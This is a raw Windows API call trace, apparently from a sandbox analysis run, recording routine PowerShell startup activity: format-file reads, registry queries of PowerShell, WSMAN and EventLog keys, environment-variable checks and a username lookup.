	[0430.734] ReadFile (in: hFile=0x1c8, lpBuffer=0x3d0dcf0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26cff8, lpOverlapped=0x0 | out: lpBuffer=0x3d0dcf0*, lpNumberOfBytesRead=0x26cff8*=0x8b4, lpOverlapped=0x0) returned 1
	[0430.734] ReadFile (in: hFile=0x1c8, lpBuffer=0x3d0d10c, nNumberOfBytesToRead=0x34c, lpNumberOfBytesRead=0x26cff8, lpOverlapped=0x0 | out: lpBuffer=0x3d0d10c*, lpNumberOfBytesRead=0x26cff8*=0x0, lpOverlapped=0x0) returned 1
	[0430.734] ReadFile (in: hFile=0x1c8, lpBuffer=0x3d0dcf0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26cff8, lpOverlapped=0x0 | out: lpBuffer=0x3d0dcf0*, lpNumberOfBytesRead=0x26cff8*=0x0, lpOverlapped=0x0) returned 1
	[0430.734] SetErrorMode (uMode=0x1) returned 0x1
	[0430.734] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x26cfa0 | out: lpFileInformation=0x26cfa0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67eea05d, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67eea05d, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe601915b, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x48b4)) returned 1
	[0430.734] SetErrorMode (uMode=0x1) returned 0x1
	[0430.734] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d088 | out: phkResult=0x26d088*=0x1c8) returned 0x0
	[0430.735] RegQueryValueExW (in: hKey=0x1c8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x26d00c, lpData=0x0, lpcbData=0x26d008*=0x0 | out: lpType=0x26d00c*=0x1, lpData=0x0, lpcbData=0x26d008*=0x56) returned 0x0
	[0430.735] CoTaskMemAlloc (cb=0x5a) returned 0x1b9a2ef0
	[0430.735] RegQueryValueExW (in: hKey=0x1c8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x26cfdc, lpData=0x1b9a2ef0, lpcbData=0x26cfd8*=0x56 | out: lpType=0x26cfdc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x26cfd8*=0x56) returned 0x0
	[0430.735] CoTaskMemFree (pv=0x1b9a2ef0) 
	[0430.735] RegCloseKey (hKey=0x1c8) returned 0x0
	[0430.735] CoCreateGuid (in: pguid=0x26d2b0 | out: pguid=0x26d2b0*(Data1=0x8f6c0ce0, Data2=0xa096, Data3=0x4b53, Data4=([0]=0x94, [1]=0x96, [2]=0xbf, [3]=0xf8, [4]=0xa9, [5]=0x7e, [6]=0x8f, [7]=0x8))) returned 0x0
	[0430.735] CoCreateGuid (in: pguid=0x26d2b0 | out: pguid=0x26d2b0*(Data1=0xcc523fbe, Data2=0x9427, Data3=0x4c1c, Data4=([0]=0xb2, [1]=0xe3, [2]=0x53, [3]=0xcf, [4]=0xfc, [5]=0x50, [6]=0xb, [7]=0x2a))) returned 0x0
	[0430.736] SetErrorMode (uMode=0x1) returned 0x1
	[0430.736] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\registry.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x1c8
	[0430.736] SetErrorMode (uMode=0x1) returned 0x1
	[0430.736] GetFileType (hFile=0x1c8) returned 0x1
	[0430.736] ReadFile (in: hFile=0x1c8, lpBuffer=0x3d4bad8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26cff8, lpOverlapped=0x0 | out: lpBuffer=0x3d4bad8*, lpNumberOfBytesRead=0x26cff8*=0x1000, lpOverlapped=0x0) returned 1
	[0430.737] ReadFile (in: hFile=0x1c8, lpBuffer=0x3d4bad8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26cff8, lpOverlapped=0x0 | out: lpBuffer=0x3d4bad8*, lpNumberOfBytesRead=0x26cff8*=0x1000, lpOverlapped=0x0) returned 1
	[0430.737] ReadFile (in: hFile=0x1c8, lpBuffer=0x3d4bad8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26cff8, lpOverlapped=0x0 | out: lpBuffer=0x3d4bad8*, lpNumberOfBytesRead=0x26cff8*=0x1000, lpOverlapped=0x0) returned 1
	[0430.738] ReadFile (in: hFile=0x1c8, lpBuffer=0x3d4bad8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26cff8, lpOverlapped=0x0 | out: lpBuffer=0x3d4bad8*, lpNumberOfBytesRead=0x26cff8*=0x1000, lpOverlapped=0x0) returned 1
	[0430.738] ReadFile (in: hFile=0x1c8, lpBuffer=0x3d4bad8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26cff8, lpOverlapped=0x0 | out: lpBuffer=0x3d4bad8*, lpNumberOfBytesRead=0x26cff8*=0xe98, lpOverlapped=0x0) returned 1
	[0430.738] ReadFile (in: hFile=0x1c8, lpBuffer=0x3d4b0d8, nNumberOfBytesToRead=0x168, lpNumberOfBytesRead=0x26cff8, lpOverlapped=0x0 | out: lpBuffer=0x3d4b0d8*, lpNumberOfBytesRead=0x26cff8*=0x0, lpOverlapped=0x0) returned 1
	[0430.739] ReadFile (in: hFile=0x1c8, lpBuffer=0x3d4bad8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26cff8, lpOverlapped=0x0 | out: lpBuffer=0x3d4bad8*, lpNumberOfBytesRead=0x26cff8*=0x0, lpOverlapped=0x0) returned 1
	[0430.739] SetErrorMode (uMode=0x1) returned 0x1
	[0430.739] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\registry.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x26cfa0 | out: lpFileInformation=0x26cfa0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67eea05d, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67eea05d, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe603f2b9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x4e98)) returned 1
	[0430.739] SetErrorMode (uMode=0x1) returned 0x1
	[0430.739] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d088 | out: phkResult=0x26d088*=0x1c8) returned 0x0
	[0430.739] RegQueryValueExW (in: hKey=0x1c8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x26d00c, lpData=0x0, lpcbData=0x26d008*=0x0 | out: lpType=0x26d00c*=0x1, lpData=0x0, lpcbData=0x26d008*=0x56) returned 0x0
	[0430.739] CoTaskMemAlloc (cb=0x5a) returned 0x1b9a2ef0
	[0430.739] RegQueryValueExW (in: hKey=0x1c8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x26cfdc, lpData=0x1b9a2ef0, lpcbData=0x26cfd8*=0x56 | out: lpType=0x26cfdc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x26cfd8*=0x56) returned 0x0
	[0430.739] CoTaskMemFree (pv=0x1b9a2ef0) 
	[0430.739] RegCloseKey (hKey=0x1c8) returned 0x0
	[0430.740] VirtualQuery (in: lpAddress=0x26bb20, lpBuffer=0x26c9e0, dwLength=0x30 | out: lpBuffer=0x26c9e0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.740] CoCreateGuid (in: pguid=0x26d2b0 | out: pguid=0x26d2b0*(Data1=0xe0e83256, Data2=0xae78, Data3=0x4eb0, Data4=([0]=0x94, [1]=0x2, [2]=0x51, [3]=0xaf, [4]=0x44, [5]=0xda, [6]=0x99, [7]=0x66))) returned 0x0
	[0430.740] CoCreateGuid (in: pguid=0x26d2b0 | out: pguid=0x26d2b0*(Data1=0xf1b23b40, Data2=0x2b6f, Data3=0x4832, Data4=([0]=0x8c, [1]=0x60, [2]=0xae, [3]=0x57, [4]=0xd0, [5]=0x35, [6]=0xea, [7]=0x96))) returned 0x0
	[0430.750] CoTaskMemAlloc (cb=0x104) returned 0x1b9a9480
	[0430.750] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b9a9480, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0430.750] CoTaskMemFree (pv=0x1b9a9480) 
	[0430.751] CoTaskMemAlloc (cb=0x104) returned 0x1b9a9480
	[0430.751] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b9a9480, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0430.751] CoTaskMemFree (pv=0x1b9a9480) 
	[0430.751] CoTaskMemAlloc (cb=0x104) returned 0x1b9a9480
	[0430.751] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b9a9480, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0430.751] CoTaskMemFree (pv=0x1b9a9480) 
	[0430.751] CoTaskMemAlloc (cb=0x104) returned 0x1b9a9480
	[0430.751] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b9a9480, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0430.751] CoTaskMemFree (pv=0x1b9a9480) 
	[0430.752] CoTaskMemAlloc (cb=0x104) returned 0x1b9a9480
	[0430.752] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b9a9480, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0430.752] CoTaskMemFree (pv=0x1b9a9480) 
	[0430.752] CoTaskMemAlloc (cb=0x104) returned 0x1b9a9480
	[0430.752] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b9a9480, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0430.752] CoTaskMemFree (pv=0x1b9a9480) 
	[0430.752] CoTaskMemAlloc (cb=0x104) returned 0x1b9a9480
	[0430.752] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b9a9480, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0430.753] CoTaskMemFree (pv=0x1b9a9480) 
	[0430.753] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WSMAN", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d298 | out: phkResult=0x26d298*=0x1c8) returned 0x0
	[0430.754] RegQueryInfoKeyW (in: hKey=0x1c8, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x26d19c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x26d198, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x26d19c*=0x6, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x26d198*=0x3, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0430.754] CoTaskMemFree (pv=0x0) 
	[0430.754] CoTaskMemAlloc (cb=0x204) returned 0xfc760
	[0430.754] RegEnumValueW (in: hKey=0x1c8, dwIndex=0x0, lpValueName=0xfc760, lpcchValueName=0x26d248, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="StackVersion", lpcchValueName=0x26d248, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0430.754] CoTaskMemFree (pv=0xfc760) 
	[0430.754] CoTaskMemAlloc (cb=0x204) returned 0xfc760
	[0430.754] RegEnumValueW (in: hKey=0x1c8, dwIndex=0x1, lpValueName=0xfc760, lpcchValueName=0x26d248, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="SupportsCompatListeners", lpcchValueName=0x26d248, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0430.754] CoTaskMemFree (pv=0xfc760) 
	[0430.754] CoTaskMemAlloc (cb=0x204) returned 0xfc760
	[0430.754] RegEnumValueW (in: hKey=0x1c8, dwIndex=0x2, lpValueName=0xfc760, lpcchValueName=0x26d248, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="UpdatedConfig", lpcchValueName=0x26d248, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0430.754] CoTaskMemFree (pv=0xfc760) 
	[0430.754] RegQueryValueExW (in: hKey=0x1c8, lpValueName="StackVersion", lpReserved=0x0, lpType=0x26d22c, lpData=0x0, lpcbData=0x26d228*=0x0 | out: lpType=0x26d22c*=0x1, lpData=0x0, lpcbData=0x26d228*=0x8) returned 0x0
	[0430.754] CoTaskMemAlloc (cb=0xc) returned 0x17e990
	[0430.754] RegQueryValueExW (in: hKey=0x1c8, lpValueName="StackVersion", lpReserved=0x0, lpType=0x26d1fc, lpData=0x17e990, lpcbData=0x26d1f8*=0x8 | out: lpType=0x26d1fc*=0x1, lpData="2.0", lpcbData=0x26d1f8*=0x8) returned 0x0
	[0430.755] CoTaskMemFree (pv=0x17e990) 
	[0430.884] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WSMAN", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d1e8 | out: phkResult=0x26d1e8*=0x1c4) returned 0x0
	[0430.884] RegQueryInfoKeyW (in: hKey=0x1c4, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x26d0ec, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x26d0e8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x26d0ec*=0x6, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x26d0e8*=0x3, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0430.885] CoTaskMemFree (pv=0x0) 
	[0430.885] CoTaskMemAlloc (cb=0x204) returned 0xfc760
	[0430.885] RegEnumValueW (in: hKey=0x1c4, dwIndex=0x0, lpValueName=0xfc760, lpcchValueName=0x26d198, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="StackVersion", lpcchValueName=0x26d198, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0430.885] CoTaskMemFree (pv=0xfc760) 
	[0430.885] CoTaskMemAlloc (cb=0x204) returned 0xfc760
	[0430.885] RegEnumValueW (in: hKey=0x1c4, dwIndex=0x1, lpValueName=0xfc760, lpcchValueName=0x26d198, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="SupportsCompatListeners", lpcchValueName=0x26d198, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0430.885] CoTaskMemFree (pv=0xfc760) 
	[0430.885] CoTaskMemAlloc (cb=0x204) returned 0xfc760
	[0430.885] RegEnumValueW (in: hKey=0x1c4, dwIndex=0x2, lpValueName=0xfc760, lpcchValueName=0x26d198, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="UpdatedConfig", lpcchValueName=0x26d198, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0430.885] CoTaskMemFree (pv=0xfc760) 
	[0430.885] RegQueryValueExW (in: hKey=0x1c4, lpValueName="StackVersion", lpReserved=0x0, lpType=0x26d17c, lpData=0x0, lpcbData=0x26d178*=0x0 | out: lpType=0x26d17c*=0x1, lpData=0x0, lpcbData=0x26d178*=0x8) returned 0x0
	[0430.885] CoTaskMemAlloc (cb=0xc) returned 0x17ead0
	[0430.885] RegQueryValueExW (in: hKey=0x1c4, lpValueName="StackVersion", lpReserved=0x0, lpType=0x26d14c, lpData=0x17ead0, lpcbData=0x26d148*=0x8 | out: lpType=0x26d14c*=0x1, lpData="2.0", lpcbData=0x26d148*=0x8) returned 0x0
	[0430.885] CoTaskMemFree (pv=0x17ead0) 
	[0430.886] CoTaskMemAlloc (cb=0x104) returned 0x1b9a9480
	[0430.886] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b9a9480, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0430.886] CoTaskMemFree (pv=0x1b9a9480) 
	[0430.890] CoTaskMemAlloc (cb=0x104) returned 0x1b9a9480
	[0430.890] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b9a9480, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0430.890] CoTaskMemFree (pv=0x1b9a9480) 
	[0431.047] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d218 | out: phkResult=0x26d218*=0x300) returned 0x0
	[0431.050] RegQueryInfoKeyW (in: hKey=0x300, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x26d18c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x26d188, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x26d18c*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x26d188*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0431.050] CoTaskMemFree (pv=0x0) 
	[0431.051] CoTaskMemAlloc (cb=0x204) returned 0xfc760
	[0431.051] RegEnumKeyExW (in: hKey=0x300, dwIndex=0x0, lpName=0xfc760, lpcchName=0x26d218, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x26d218, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0431.051] CoTaskMemFree (pv=0xfc760) 
	[0431.051] CoTaskMemFree (pv=0x0) 
	[0431.051] CoTaskMemAlloc (cb=0x204) returned 0xfc760
	[0431.052] RegEnumKeyExW (in: hKey=0x300, dwIndex=0x1, lpName=0xfc760, lpcchName=0x26d218, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x26d218, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0431.052] CoTaskMemFree (pv=0xfc760) 
	[0431.052] CoTaskMemFree (pv=0x0) 
	[0431.052] CoTaskMemAlloc (cb=0x204) returned 0xfc760
	[0431.052] RegEnumKeyExW (in: hKey=0x300, dwIndex=0x2, lpName=0xfc760, lpcchName=0x26d218, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x26d218, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0431.052] CoTaskMemFree (pv=0xfc760) 
	[0431.052] CoTaskMemFree (pv=0x0) 
	[0431.052] CoTaskMemAlloc (cb=0x204) returned 0xfc760
	[0431.052] RegEnumKeyExW (in: hKey=0x300, dwIndex=0x3, lpName=0xfc760, lpcchName=0x26d218, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x26d218, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0431.052] CoTaskMemFree (pv=0xfc760) 
	[0431.052] CoTaskMemFree (pv=0x0) 
	[0431.052] CoTaskMemAlloc (cb=0x204) returned 0xfc760
	[0431.052] RegEnumKeyExW (in: hKey=0x300, dwIndex=0x4, lpName=0xfc760, lpcchName=0x26d218, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x26d218, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0431.052] CoTaskMemFree (pv=0xfc760) 
	[0431.052] CoTaskMemFree (pv=0x0) 
	[0431.052] CoTaskMemAlloc (cb=0x204) returned 0xfc760
	[0431.052] RegEnumKeyExW (in: hKey=0x300, dwIndex=0x5, lpName=0xfc760, lpcchName=0x26d218, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x26d218, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0431.052] CoTaskMemFree (pv=0xfc760) 
	[0431.052] CoTaskMemFree (pv=0x0) 
	[0431.052] CoTaskMemAlloc (cb=0x204) returned 0xfc760
	[0431.052] RegEnumKeyExW (in: hKey=0x300, dwIndex=0x6, lpName=0xfc760, lpcchName=0x26d218, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x26d218, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0431.052] CoTaskMemFree (pv=0xfc760) 
	[0431.052] CoTaskMemFree (pv=0x0) 
	[0431.052] CoTaskMemAlloc (cb=0x204) returned 0xfc760
	[0431.053] RegEnumKeyExW (in: hKey=0x300, dwIndex=0x7, lpName=0xfc760, lpcchName=0x26d218, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x26d218, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0431.053] CoTaskMemFree (pv=0xfc760) 
	[0431.053] CoTaskMemFree (pv=0x0) 
	[0431.053] CoTaskMemAlloc (cb=0x204) returned 0xfc760
	[0431.053] RegEnumKeyExW (in: hKey=0x300, dwIndex=0x8, lpName=0xfc760, lpcchName=0x26d218, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x26d218, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0431.053] CoTaskMemFree (pv=0xfc760) 
	[0431.053] CoTaskMemFree (pv=0x0) 
	[0431.053] RegOpenKeyExW (in: hKey=0x300, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d278 | out: phkResult=0x26d278*=0x304) returned 0x0
	[0431.053] RegOpenKeyExW (in: hKey=0x304, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d278 | out: phkResult=0x26d278*=0x0) returned 0x2
	[0431.053] RegOpenKeyExW (in: hKey=0x300, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d278 | out: phkResult=0x26d278*=0x318) returned 0x0
	[0431.053] RegOpenKeyExW (in: hKey=0x318, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d278 | out: phkResult=0x26d278*=0x0) returned 0x2
	[0431.053] RegOpenKeyExW (in: hKey=0x300, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d278 | out: phkResult=0x26d278*=0x32c) returned 0x0
	[0431.053] RegOpenKeyExW (in: hKey=0x32c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d278 | out: phkResult=0x26d278*=0x0) returned 0x2
	[0431.053] RegOpenKeyExW (in: hKey=0x300, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d278 | out: phkResult=0x26d278*=0x330) returned 0x0
	[0431.054] RegOpenKeyExW (in: hKey=0x330, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d278 | out: phkResult=0x26d278*=0x0) returned 0x2
	[0431.054] RegOpenKeyExW (in: hKey=0x300, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d278 | out: phkResult=0x26d278*=0x334) returned 0x0
	[0431.054] RegOpenKeyExW (in: hKey=0x334, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d278 | out: phkResult=0x26d278*=0x0) returned 0x2
	[0431.054] RegOpenKeyExW (in: hKey=0x300, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d278 | out: phkResult=0x26d278*=0x338) returned 0x0
	[0431.054] RegOpenKeyExW (in: hKey=0x338, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d278 | out: phkResult=0x26d278*=0x0) returned 0x2
	[0431.054] RegOpenKeyExW (in: hKey=0x300, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d278 | out: phkResult=0x26d278*=0x33c) returned 0x0
	[0431.054] RegOpenKeyExW (in: hKey=0x33c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d278 | out: phkResult=0x26d278*=0x0) returned 0x2
	[0431.054] RegOpenKeyExW (in: hKey=0x300, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d278 | out: phkResult=0x26d278*=0x340) returned 0x0
	[0431.054] RegOpenKeyExW (in: hKey=0x340, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d278 | out: phkResult=0x26d278*=0x0) returned 0x2
	[0431.054] RegOpenKeyExW (in: hKey=0x300, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d278 | out: phkResult=0x26d278*=0x344) returned 0x0
	[0431.055] RegOpenKeyExW (in: hKey=0x344, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d278 | out: phkResult=0x26d278*=0x348) returned 0x0
	[0431.055] RegCloseKey (hKey=0x348) returned 0x0
	[0431.055] RegCloseKey (hKey=0x300) returned 0x0
	[0431.056] RegCloseKey (hKey=0x344) returned 0x0
	[0431.065] CoTaskMemAlloc (cb=0x804) returned 0xf05a0
	[0431.065] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0xf05a0, nSize=0x26d488 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x26d488) returned 0x1
	[0431.066] CoTaskMemFree (pv=0xf05a0) 
	[0431.067] CoTaskMemAlloc (cb=0x204) returned 0xfc760
	[0431.067] GetUserNameW (in: lpBuffer=0xfc760, pcbBuffer=0x26d4c8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x26d4c8) returned 1
	[0431.067] CoTaskMemFree (pv=0xfc760) 
	[0431.199] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d1c8 | out: phkResult=0x26d1c8*=0x34c) returned 0x0
	[0431.199] RegQueryInfoKeyW (in: hKey=0x34c, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x26d13c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x26d138, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x26d13c*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x26d138*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0431.199] CoTaskMemFree (pv=0x0) 
	[0431.199] CoTaskMemAlloc (cb=0x204) returned 0xfc760
	[0431.199] RegEnumKeyExW (in: hKey=0x34c, dwIndex=0x0, lpName=0xfc760, lpcchName=0x26d1c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x26d1c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0431.199] CoTaskMemFree (pv=0xfc760) 
	[0431.199] CoTaskMemFree (pv=0x0) 
	[0431.199] CoTaskMemAlloc (cb=0x204) returned 0xfc760
